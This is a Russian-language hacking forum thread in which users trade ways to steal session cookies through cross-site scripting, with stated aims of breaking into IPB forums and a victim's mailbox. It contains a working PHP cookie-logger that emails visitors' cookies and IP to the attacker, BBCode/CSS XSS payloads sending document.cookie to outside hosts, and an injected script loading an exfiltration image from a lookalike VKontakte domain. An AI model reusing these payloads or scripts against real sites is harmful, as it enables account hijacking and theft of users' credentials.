такой же врядли, его писали админы и врядли будет бесплатная раздача (да и платная тоже) - а зачем тебе именно такой? тут для персонального сниффера много лишнего, проще словить куку и послать хозяину в письме с реферером и прочим. PHP: <? $mymail = '[email protected]'; $date = date('d.m.y - H:i:s'); $ip = UrlDecode(getenv('REMOTE_ADDR')); $referer = UrlDecode(getenv('HTTP_REFERER')); $query = UrlDecode(getenv('QUERY_STRING')); $cookie=getenv('HTTP_COOKIE'); mail("$mymail", "Kyka npuIIIJIa", " Date and Time: $date\n IP: $ip\n Adress: $referer\n Query String: $query\n Cookie: $cookie"); ?>
Мне бы любой сниффер который бы работал как с этим HTML: [email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);` Только картинки *ttp://antichat.ru/cgi-bin/s.jpg чтоб был мой адресс
coco Выражай свои мысли как-нибудь попонятнее, ок? Что ты имеешь ввиду? Хочешь засунуть в подпись скрипт сниффера??=)))))))))))))) Если я тебя правильно понял, то так нельзя. Делай, как сказал .::Gh0st::..
Неее, я просто хочю зделать сниффер как на античат. Только чтоб он стоял на моем сервере, и я смог ломать Ipb через Xss что ты мне дал.
А можно ли вставить это HTML: http://s.netsec.ru//s.gif?id=561 в HTML: [email]wj@wj[url=http://www.wj.com`=`][/url].com[/email] ` style=`background:url(javascript:document.images[1].src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie);`
получишь HTML: [email]gh0st@gh0st[url=http://gh0st.gov`=`][/url].gov[/email] ` style=`background:url(javascript:document.images[1].src="http://s.netsec.ru/your_login/pic.gif?"+document.cookie);` регай себе PS - personal sniffer и там свой логин (your_login) указывай, впрочем там тебе твой линк на картинку дадут... на всякий лучай скажу, что бага не везде работает, так что не думай, что щас все должно ломаться...
.::Gh0st::. зафигачила скрипт в инет (хост поддерживает пхп) отправила ссылку на сайт на мыло. пришел только id текущей сессии, но это мне врядли поможет... ибо мне нужно узнать пароль от ящика, но который отправляется письмо. с остальными снифами та же трабла, шлет IP, ID, еще какую то хрень, но пасс не шлет. я вообщето, даже и на хэш пасса согласна , дешифровщиком тьма.. добавь пожалуйста в свой скрипт фунцию тырения пароля )) --------------------- + наставлю, не вапрос!
суть в том, что нужно не просто ссылку заслать, а выполнить javascript в контексте уязвимого сайта и послать куки на свой скрипт. просто зайти поссылке - результата не даст.
привет можете обьяснить не получаеться кое что <? $mymail = '[email protected]'; $date = date('d.m.y - H:i:s'); $ip = UrlDecode(getenv('REMOTE_ADDR')); $referer = UrlDecode(getenv('HTTP_REFERER')); $query = UrlDecode(getenv('QUERY_STRING')); $cookie=getenv('HTTP_COOKIE'); mail("$mymail", "Kyka npuIIIJIa", " Date and Time: $date\n IP: $ip\n Adress: $referer\n Query String: $query\n Cookie: $cookie"); ?> это скрипт я пишу два скрипта index.php <script>document.location.href="уязвимость=%22%3E%3Cscript%20src=http://vkontaktes.h16.ru/js.js%3E%3C/script%3E"</script> js.js img=new Image(); img.src="http://vkontaktes.h16.ru/1.php"+document.cookie; 1.php- это для прихода куков на мыло куки не идут на мыло и приходит токо айпи
например как твои исходники. ты сейвишь куки своего сайта а надо из query стринг так что убирай ваще то что $cookie=getenv('HTTP_COOKIE'); и тд. а вообще... за археологию банят